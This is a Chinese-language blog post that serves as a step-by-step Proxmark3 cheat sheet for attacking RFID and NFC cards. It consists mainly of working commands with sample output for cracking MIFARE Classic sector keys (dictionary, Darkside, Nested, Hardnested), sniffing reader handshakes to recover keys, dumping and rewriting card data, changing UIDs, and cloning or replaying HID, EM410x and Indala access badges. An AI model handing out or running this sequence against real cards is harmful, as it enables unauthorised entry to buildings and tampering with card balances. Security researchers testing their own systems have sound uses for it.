Proxmark3 NFC Attack
ssooking Lv5
  2020-01-25 13:19:00 2020-01-25 13:19    

环境准备

Proxmark3,支持各种高低频卡,可通过配套软件实现破解、嗅探、模拟、复制等功能,被誉为 RFID 界的瑞士军刀。

安装Proxmark3环境

https://github.com/Proxmark/proxmark3/wiki/Kali-Linux

Install the Proxmark3 on Kali Linux

1
2
3
4
5
6
7
8
9
10
11
# kali
$ sudo apt-get install git build-essential libreadline5 libreadline-dev gcc-arm-none-eabi libusb-0.1-4 libusb-dev libqt4-dev ncurses-dev perl pkg-config libpcsclite-dev pcscd


# ubuntu
sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd

# Install Proxmark3
git clone https://github.com/Proxmark/proxmark3.git
cd proxmark3
make clean && make all

确认Proxmark3工作状态

把PM3连接上,查看是否已经识别设备

1
2
3
4
5
6
7
8
9
10
$ lsusb
Bus 001 Device 002: ID 0e0f:000b VMware, Inc. 
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 005: ID 9ac4:4b8f J. Westhues ProxMark-3 RFID Instrument

$ sudo dmesg | grep -i usb | grep proxmark
......
[ 2836.850296] usb 4-2.4: Product: proxmark3
[ 2836.850297] usb 4-2.4: Manufacturer: proxmark.org
[ 2836.853857] cdc_acm 4-2.4:1.0: ttyACM0: USB ACM device

正常工作状态下,PM3应该只显示白色灯。

如果连接时亮橘红色和绿色灯,或插入系统时检测不到设备(没反应),可能需要更新CDC Bootloader。

操作步骤:

  1. 拔掉USB线,让PM3 断电。
  2. 然后按住PM3侧边的按钮不放,USB插入电脑,此时应该可以检测到设备了。
  3. 继续按着不放,在/dev下找到PM3设备串口。kali中应该是/dev/ttyACM0
  4. 重刷CDC Bootloader
1
2
3
# CDC Bootloader
cd proxmark3/client
sudo ./flasher /dev/ttyACM0 -b ../bootrom/obj/bootrom.elf

重刷完CDC Bootloader之后,系统应该能正常识别PM3了。

  1. 更新固件Firmware

继续按住按钮不放,执行下面的命令:

1
2
cd proxmark3/client
sudo ./flasher /dev/ttyACM0 ../armsrc/obj/fullimage.elf

设备状态正常的情况下,执行下面的命令进行proxmark3工具的命令交互界面

1
sudo ./proxmark3 /dev/ttyACM0

查看下PM3设备的基本状态

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 查看状态
proxmark3> hw status (hw sta)

# 查看固件版本
proxmark3> hw version(hw ver)

# 测试电压
proxmark3> hw tune
Measuring antenna characteristics, please wait........          
# LF antenna: 22.27 V @   125.00 kHz          
# LF antenna: 31.76 V @   134.00 kHz          
# LF optimal: 31.76 V @   133.33 kHz          
# HF antenna: 20.17 V @    13.56 MHz          
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

破解扇区密钥

https://www.cnblogs.com/k1two2/p/5706516.html

https://blog.csdn.net/qq_37806908/article/details/95992392

出厂默认密钥

M1卡出厂时使用统一的默认密钥,密钥A和密钥B的值均为FFFFFFFFFFFF,控制位为FF087069,也有一部分制造商使用自己的简单密钥作为出厂密钥。发卡商为了便利通常使用厂家提供的默认密钥,或者仅仅将包含重要数据的扇区修改密钥。对M1卡的扇区进行默认密钥扫描有助于我们提高破解的效率,并且可用来判断该卡是否为全加密卡,若未扫描到默认密钥则直接使用嗅探手段获取密钥。

使用hf mf chk *4 ? t命令开始扫描,该命令使用12个全球通用的默认密钥扫描0-39扇区,若事先知道所用数据在多少扇区及对应的密钥类型,可以修改指令来缩短扫描时间。扫描大概需要1分钟时间,完成后可以看到除了10-15扇区外其他扇区的密钥均为FFFFFFFFFFFF,这说明10-15扇区存放了一卡通的关键数据,这6个扇区就是后续数据分析研究的重点对象。

1
2
3
4
5
6
7
8
9
10
11
12
13
proxmark3> hf search
proxmark3> hf 14a info

#扫描所有扇区默认密钥
proxmark3> hf mf chk * ?

#扫描0扇区A密码
proxmark3> hf mf chk 0 A   

#扫描扇区2第7块A密码
proxmark3> hf mf chk 8 A

#注:(中间的数字是块数,0扇区块编号0-3,1扇区块数编号4-7,2扇区块数编号8-11)

密钥字典爆破

1
2
3
4
5
6
7
8
9
10
11
# 字典爆破全扇区AB密钥
proxmark3> hf mf chk * ? /home/ssooking/key.txt

#字典爆破全扇区A密钥
proxmark3> hf mf chk * A /home/ssooking/test.txt

#字典爆破0扇区A密钥
proxmark3> hf mf chk 0 A /home/ssooking/key.txt

#字典爆破2扇区B密钥
proxmark3> hf mf chk A /home/ssooking/key.txt

Dark-Side Attack

(仅适用于Weak Prng)

1
proxmark3> hf mf mifare

Nested Authentication Exploit

(仅适用于Weak Prng)

1
2
3
4
#已知某密钥的情况下执行NESTED攻击进行嵌套攻击,枚举&爆破key:
##使用已知密钥运行嵌套攻击
proxmark3> hf mf nested 1 [sector] [key_A/B] [known_key_val]
proxmark3> hf mf nested 1 0 A ffffffffffff

也可以使用mfoc或者mfuck等工具破解某个扇区的密钥

验证key是否正确

1
2
3
# 测试⼀下我们拿到的密钥对不对,错误不会返回Found valid key:[xxxxx]
proxmark3> hf mf chk 0 A ffffffffffff
proxmark3> hf mf chk 0 ? ffffffffffff

读取加密扇区数据

All of a sudden we have a new key: 080808080808. This key allows us to read our secret blocks:

1
2
3
4
proxmark3> hf mf rdbl 5 A 080808080808

#写入区块内容
hf mf wrbl 5 A 080808080808 32110000cdeeffff3211000005fa05fa

克隆卡片

  1. 使用上面的方法破解出卡密钥

  2. 导出加密区密钥(获取全扇区秘钥)

1
2
3
4
5
proxmark3> hf mf nested 1 0 A xxxxxxxxx d

proxmark3> hf mf nested 1 0 A ffffffffffff d

#此时会输出文件dumpkeys.bin

3.导出卡数据

1
2
#参数:1=1K(default), 2=2K, 4=4K
proxmark3> hf mf dump 1

4、写入数据到空白卡

1
proxmark3> hf mf restore 1

或者或者先处理导出数据文件的格式,将dumpdata.bin这个二进制文件转换成eml格式的文本信息。PM3自带dumptoemul.lua脚本进行处理。处理完后会生成eml文件。此外也可以使用python或perl脚本处理

1
2
3
4
5
6
proxmark3> hf mf dump				#输出文件dumpdata.bin
proxmark3> script run dumptoemul.lua
...
Wrote an emulator-dump to the file 54CDBDD1.eml

#script run dumptoemul -i dumpdata.bin

写入数据到空白卡

1
2
3
proxmark3> hf mf eclr							 #清除仿真内存的各区块数据
proxmark3> hf mf eload 54CDBDD1    #加载Mifare标签转储数据到内存中
proxmark3> hf mf cload 54CDBDD1		 #将卡的dump数据写入空白卡

修改卡UID

Cracking Mifare Classic 1K Cards

1
2
proxmark3> hf 14a info
proxmark3> hf mf csetuid 798BBB39 0004 08

克隆HID卡

1
2
3
4
5
6
7
proxmark3> lf search
...
HID Prox TAG ID: 2004263f88 (8132) - Format Len: 26bit - FC: 19 - Card: 8132  
Valid HID Prox ID Found! 

# EM410X
lf em 410xread

嗅探通信

如果卡片不存在弱RNG问题,唯一可行的破解密钥的方法就是抓取分析握手包。

  1. 识别读卡器上的Classic 1K卡:
1
hf 14a reader
  1. Proxmark3有一个嗅探模式可以记录和转储所有的RFID通信,设置PM3进入嗅探模式:
1
hf 14a snoop

  1. 开始嗅探数据

    1
    hf mf sniff

    Proxmark3在传输期间必须非常靠近两个设备,完成刷卡后,应按Proxmark3中的按钮停止嗅探。

  2. 将嗅探模式捕获的数据打印到终端显示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
proxmark3> hf list 14a


例子:
proxmark3> hf 14a snoop
#db# cancelled by button
#db# COMMAND FINISHED
#db# maxDataLen=4, Uart.state=0, Uart.len=0
#db# traceLen=3179, Uart.output[0]=000000cb

proxmark3> hf list 14a
Recorded Activity (TraceLen = 3179 bytes)

Start = Start of Start Bit, End = End of last modulation. Src = Source of Transfer
iso14443a - All times are in carrier periods (1/13.56Mhz)
iClass    - Timings are not as accurate
xxxx

捕获的数据中如果有感叹号表示位读取错误,可能需要读取多次才能捕获到完整的且没有任何错误的握手包,此时可以获取到提取密钥所需的UID、NT、NR、AR、AT等值。

  1. 在捕获到符合条件的握手包后,提取握手包中的有效密钥
1
2
./tools/mfkey/mfkey64 [CARD_UID] [NT] [NR] [AR] [AT]
./tools/mfkey/mfkey64 9c599b32 82a4166c a1e458ce 6eea41e0 5cadf439 e709c8a
  1. 成功提取有效密钥后,使用HardNested攻击破击其他密钥
1
2
3
4
5
6
7
8
9
10
hf mf hardnested [known_key_block] [known_key_type] [known_key] [target_block] [target_key_type]

hf mf hardnested 0 A key 0 B


# <block number> <key A|B> <key (12 hex symbols)>
# <target block number> <target key A|B> [known target key (12 hex symbols)] [w] [s]
# w: Acquire nonces and write them to binary file nonces.bin

hf mf hardnested 0 A 8829da9daf76 4 A w

修改卡数据

All of a sudden we have a new key: 080808080808. This key allows us to read our secret blocks:

1
2
3
4
proxmark3> hf mf rdbl 5 A 080808080808

#写入区块内容
hf mf wrbl 5 A 080808080808 32110000cdeeffff3211000005fa05fa

Once you have all the keys that you need:

Read the data from a particular block: hf mf rdbl [block] [A/B] [key]

Read all the data for a particular sector: hf mf rdsc [sector] [A/B] [key]

Write a specific block with your own data: hf mf wrbl [block_num] [key_type] [key] [block data]

模拟卡片

重放RFID信号

https://www.offensive-security.com/offsec/cloning-rfid-tags-with-proxmark-3/

https://scund00r.com/all/rfid/2018/06/05/proxmark-cheatsheet.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
### EM410X TAGS
Proxmark> lf read
Proxmark> lf em4x em410xread
EM410x Tag ID: 23004d4dee
Proxmark> lf em4x em410xsim 23004d4dee   #当Proxmark读取了标签后,便可以尝试重播它

#使用PM3模拟Marefare门禁卡:
proxmark3> hf mf sim
 uid:N/A, numreads:0, flags:0 (0x00)           
#db# 4B UID: 2CF0550B              

Proxmark> hf mf eload 54CDBDD1
Proxmark> hf mf sim u 54CDBDD1

# Indala
lf indala read
lf indala demod
lf indala sim a0000000c2c436c1
lf indala clone a0000000c2c436c1

其他

修改卡UID

Cracking Mifare Classic 1K Cards https://www.youtube.com/watch?v=GqHaZicizvg

1
2
3
4
5
proxmark3> hf search
proxmark3> hf search
proxmark3> hf mf csetuid 798BBB39 0004 08

proxmark3> hf mf csetuid ba2ea6ab

HID卡 Hacking

1
2
3
4
5
6
7
8
proxmark3> lf search  
HID Prox TAG ID: 2004263f88 (8132) ...

proxmark3> lf hid fskdemod

proxmark3> lf hid clone 2004263f88  
Cloning tag with ID 2004263f88  
#db# DONE!

hex2dumpkeys.pl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
my $v = <<EOF;
  |000|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |          
  |001|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |
  ...          
  |015|  a0a0a0a0a0a0  | 1 |  b0b0b0b0b0b0  | 1 |    
EOF
my @a;
while ($v =~ /.*?([0-9a-f]{12})/is) { push @a, $1; $v = $'; }
open FH, ">dumpkeys.bin";
binmode FH;
foreach my $odd (0,1) {
  for (my $i=$odd;$i<=$#a;$i+=2) {
    my $s = $a[$i];
    while (length($s)) {
      print FH pack('C', oct('0x'.substr($s,0,2)));
      $s = substr($s, 2);
    }
  }
}
close FH;

常见卡指纹

1
2
3
4
5
6
7
8
9
10
11
# MIFARE Classic卡
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 
Valid ISO14443A Tag Found - Quiting Search

#HID ProxCard
HID Prox TAG ID: 2004263f88 (8132) - Format Len: 26bit - FC: 19 - Card: 8132  
Valid HID Prox ID Found!


# EM410x 
Valid EM410x ID Found!

有了标签ID,我们现在需要一张空白的RFID卡,可以将标签ID克隆到其中。最好的卡是T5577,它可以模拟各种低频卡,包括此处讨论的两种卡(HID ProxCard,EM41000)

远程克隆读取RFID

steal RFID tags from multiple feet away

参考

  • Post title:Proxmark3 NFC Attack
  • Post author:ssooking
  • Create time:2020-01-25 13:19:00
  • Post link:https://ssooking.github.io/2020/01/proxmark3-nfc-attack/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.